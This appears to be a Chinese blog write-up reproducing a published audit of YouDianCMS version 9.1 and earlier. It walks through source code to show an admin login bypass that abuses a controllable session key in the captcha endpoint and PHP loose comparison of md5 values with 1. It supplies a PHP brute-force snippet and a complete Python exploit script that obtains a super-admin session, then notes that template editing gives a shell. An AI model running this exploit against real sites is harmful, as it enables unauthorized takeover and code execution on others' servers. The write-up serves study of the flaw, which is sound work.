YouDianCMS GetShell
- PHP代码审计,由于自己太菜啦,就先复现前辈们的文章来学习吧,参考下列文章。
- https://forum.butian.net/share/132
- 友点CMS后台登录绕过GetShell,版本要求<=9.1
后台登录绕过
- 验证码可设置session
- session(AdminGroupID==1)超级管理员
- 后台模板修改代码执行
后台登录判断
- App/Lib/Action/AdminBaseAction.class.php
- 主要是isLogin()和checkPurview()这两个函数
if( !$this->isLogin() && !in_array($mName, $NoCheckAction)){ //没有登录,将返回登录页面
$this->redirect("Public/login");
}
if( !$this->checkPurview() ){ //没有登录,将返回网站首页
$this->redirect("Public/welcome");
}
- 先跟进isLogin函数,发现只对session进行了校验,跟进session函数App/core/Common/functions.php,发现这是检查session,只要不为空即可。
function isLogin(){
$b = session("?AdminID") && session("?AdminName");
return $b;
}
- 回到App/Lib/Action/AdminBaseAction.class.php
- 再再跟进checkPurview函数,进入session函数发现发现这只是获取session值。然后这里是个弱比较,因此可能被绕过。那么就是管理员权限。
function checkPurview(){
$gid = session('AdminGroupID');
if( $gid == 1 ) return true; //超级管理员拥有所有权限
......
}
session设置
-
App/Lib/Action/BaseAction.class.php
-
获取验证码参数可控,访问方式为http://127.0.0.1/index.php/base?a=verifycode&verify=
//获取校验码
function verifyCode(){
$length = $_GET['length']; //长度
$mode = $_GET['mode']; //模式
$type = $_GET['type']; //图像类型
$width = $_GET['width']; //宽度
$height = $_GET['height']; //高度
$verifyName = $_GET['verify']; //验证码session名称
import("ORG.Util.Image");
Image::buildImageVerify($length, $mode, $type, $width, $height, $verifyName);
}
- 继续跟进buildImageVerify函数,发现能够控制session的键名,值则是对产生的字符进行md5加密,不可控。
static function buildImageVerify($length=4, $mode=1, $type='png', $width=48, $height=22, $verifyName='verify'){
import('ORG.Util.StringEx');
$randval = StringEx::randString($length, $mode);
$_SESSION[$verifyName] = md5($randval);
........
}
- 联系后台登录的权限校验,结合我们可设置任意session键名,因此isLogin函数可直接被绕过。但是成为管理员,还需要研究。那么仅需跟进这个生成字符的函数randstring
static public function randString($len=6,$type='',$addChars='') {
$str ='';
switch($type) {
case 0:
$chars='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'.$addChars;
break;
case 1:
$chars= str_repeat('0123456789',3);
break;
case 2:
$chars='ABCDEFGHIJKLMNOPQRSTUVWXYZ'.$addChars;
break;
case 3:
$chars='abcdefghijklmnopqrstuvwxyz'.$addChars;
break;
case 4:
$chars = "们以我到他会作时要动国产的一是工就年阶义发成部民可出能方进在了不和有大这主中人上为来分生对于学下级地个用同行面说种过命度革而多子后自社加小机也经力线本电高量长党得实家定深法表着水理化争现所二起政三好十战无农使性前等反体合斗路图把结第里正新开论之物从当两些还天资事队批点育重其思与间内去因件日利相由压员气业代全组数果期导平各基或月毛然如应形想制心样干都向变关问比展那它最及外没看治提五解系林者米群头意只明四道马认次文通但条较克又公孔领军流入接席位情运器并飞原油放立题质指建区验活众很教决特此常石强极土少已根共直团统式转别造切九你取西持总料连任志观调七么山程百报更见必真保热委手改管处己将修支识病象几先老光专什六型具示复安带每东增则完风回南广劳轮科北打积车计给节做务被整联步类集号列温装即毫知轴研单色坚据速防史拉世设达尔场织历花受求传口断况采精金界品判参层止边清至万确究书术状厂须离再目海交权且儿青才证低越际八试规斯近注办布门铁需走议县兵固除般引齿千胜细影济白格效置推空配刀叶率述今选养德话查差半敌始片施响收华觉备名红续均药标记难存测士身紧液派准斤角降维板许破述技消底床田势端感往神便贺村构照容非搞亚磨族火段算适讲按值美态黄易彪服早班麦削信排台声该击素张密害侯草何树肥继右属市严径螺检左页抗苏显苦英快称坏移约巴材省黑武培著河帝仅针怎植京助升王眼她抓含苗副杂普谈围食射源例致酸旧却充足短划剂宣环落首尺波承粉践府鱼随考刻靠够满夫失包住促枝局菌杆周护岩师举曲春元超负砂封换太模贫减阳扬江析亩木言球朝医校古呢稻宋听唯输滑站另卫字鼓刚写刘微略范供阿块某功套友限项余倒卷创律雨让骨远帮初皮播优占死毒圈伟季训控激找叫云互跟裂粮粒母练塞钢顶策双留误础吸阻故寸盾晚丝女散焊功株亲院冷彻弹错散商视艺灭版烈零室轻血倍缺厘泵察绝富城冲喷壤简否柱李望盘磁雄似困巩益洲脱投送奴侧润盖挥距触星松送获兴独官混纪依未突架宽冬章湿偏纹吃执阀矿寨责熟稳夺硬价努翻奇甲预职评读背协损棉侵灰虽矛厚罗泥辟告卵箱掌氧恩爱停曾溶营终纲孟钱待尽俄缩沙退陈讨奋械载胞幼哪剥迫旋征槽倒握担仍呀鲜吧卡粗介钻逐弱脚怕盐末阴丰雾冠丙街莱贝辐肠付吉渗瑞惊顿挤秒悬姆烂森糖圣凹陶词迟蚕亿矩康遵牧遭幅园腔订香肉弟屋敏恢忘编印蜂急拿扩伤飞露核缘游振操央伍域甚迅辉异序免纸夜乡久隶缸夹念兰映沟乙吗儒杀汽磷艰晶插埃燃欢铁补咱芽永瓦倾阵碳演威附牙芽永瓦斜灌欧献顺猪洋腐请透司危括脉宜笑若尾束壮暴企菜穗楚汉愈绿拖牛份染既秋遍锻玉夏疗尖殖井费州访吹荣铜沿替滚客召旱悟刺脑措贯藏敢令隙炉壳硫煤迎铸粘探临薄旬善福纵择礼愿伏残雷延烟句纯渐耕跑泽慢栽鲁赤繁境潮横掉锥希池败船假亮谓托伙哲怀割摆贡呈劲财仪沉炼麻罪祖息车穿货销齐鼠抽画饲龙库守筑房歌寒喜哥洗蚀废纳腹乎录镜妇恶脂庄擦险赞钟摇典柄辩竹谷卖乱虚桥奥伯赶垂途额壁网截野遗静谋弄挂课镇妄盛耐援扎虑键归符庆聚绕摩忙舞遇索顾胶羊湖钉仁音迹碎伸灯避泛亡答勇频皇柳哈揭甘诺概宪浓岛袭谁洪谢炮浇斑讯懂灵蛋闭孩释乳巨徒私银伊景坦累匀霉杜乐勒隔弯绩招绍胡呼痛峰零柴簧午跳居尚丁秦稍追梁折耗碱殊岗挖氏刃剧堆赫荷胸衡勤膜篇登驻案刊秧缓凸役剪川雪链渔啦脸户洛孢勃盟买杨宗焦赛旗滤硅炭股坐蒸凝竟陷枪黎救冒暗洞犯筒您宋弧爆谬涂味津臂障褐陆啊健尊豆拔莫抵桑坡缝警挑污冰柬嘴啥饭塑寄赵喊垫丹渡耳刨虎笔稀昆浪萨茶滴浅拥穴覆伦娘吨浸袖珠雌妈紫戏塔锤震岁貌洁剖牢锋疑霸闪埔猛诉刷狠忽灾闹乔唐漏闻沈熔氯荒茎男凡抢像浆旁玻亦忠唱蒙予纷捕锁尤乘乌智淡允叛畜俘摸锈扫毕璃宝芯爷鉴秘净蒋钙肩腾枯抛轨堂拌爸循诱祝励肯酒绳穷塘燥泡袋朗喂铝软渠颗惯贸粪综墙趋彼届墨碍启逆卸航衣孙龄岭骗休借".$addChars;
break;
default :
// 默认去掉了容易混淆的字符oOLl和数字01,要添加请使用addChars参数
$chars='ABCDEFGHIJKMNPQRSTUVWXYZabcdefghijkmnpqrstuvwxyz23456789'.$addChars;
break;
}
if($len>10 ) {//位数过长重复字符串一定次数
$chars= $type==1? str_repeat($chars,$len) : str_repeat($chars,5);
}
if($type!=4) {
$chars = str_shuffle($chars);
$str = substr($chars,0,$len);
}else{
// 中文随机字
for($i=0;$i<$len;$i++){
$str.= self::msubstr($chars, floor(mt_rand(0,mb_strlen($chars,'utf-8')-1)),1,'utf-8',false);
}
}
return $str;
}
- 发现它是有多种不同的方式生成字符的,而我们需要的则是让生成的字符md5加密后弱等于1,那么我们就是管理员权限了。这里我们可以手动测试哈。发现1-100中有19,24,35这三个数字md5加密后==1判断成功。1-1000只有20个那么按概率来看在1-100中选更有可能命中。
<?php
$times = 0;
for($num=0;$num<10000000000;$num++) {
$gid = md5((string)$num);
if ($gid == 1 ) {
echo 'admin ';
echo $num.PHP_EOL;
$times += 1;
if($times>100) {
break;
exit();
}
}
}
- 再回到字符生成函数,我们只需要数字,因此我们需要type=1,然后再1-100中只有三个数字可以,且都为两位数,因此需要截取的数字长度为2则len=2。而参数传递是buildImageVerify函数带来的,而最终参数则是verifyCode带来的,且可控,因此可绕过登录。
Script
- 其他的phpsessid仅仅可登录后台,但是不为管理员权限,OK上面的phpsessid则为管理员权限。
import requests
from time import sleep
def banner(domain):
print("-"*10 + "=<V9.1" + "-"*10)
VersionURL = domain + '/index.php/base?a=Version'
res_version = requests.get(VersionURL)
print("-"*11 + res_version.text + "-"*11)
def Session(req,domain):
URL = domain + '/index.php/base?a=verifycode&verify='
AdminURL = domain + '/index.php/Admin/Public/AdminLeft/MenuTopID/7'
payload_one = 'AdminID'
payload_two = 'AdminName'
payload_three = 'AdminGroupID&mode=1&length=2'
res_one = req.get(URL + payload_one).headers
if 'set-cookie' in res_one:
print(res_one['set-cookie'])
res_two = req.get(URL + payload_two).headers
# print(res_two)
res_three = req.get(URL + payload_three).headers
# print(res_three)
res_admin = req.get(AdminURL)
if '模板' in res_admin.text:
print('OK')
return True
if __name__ == '__main__':
domain = 'http://127.0.0.1/youdiancms'
banner(domain)
while True:
req = requests.session()
if Session(req,domain):
break
sleep(0.5)
后台模板GetShell
- 更改模板后再访问首页即可
逆水行舟,不进则退。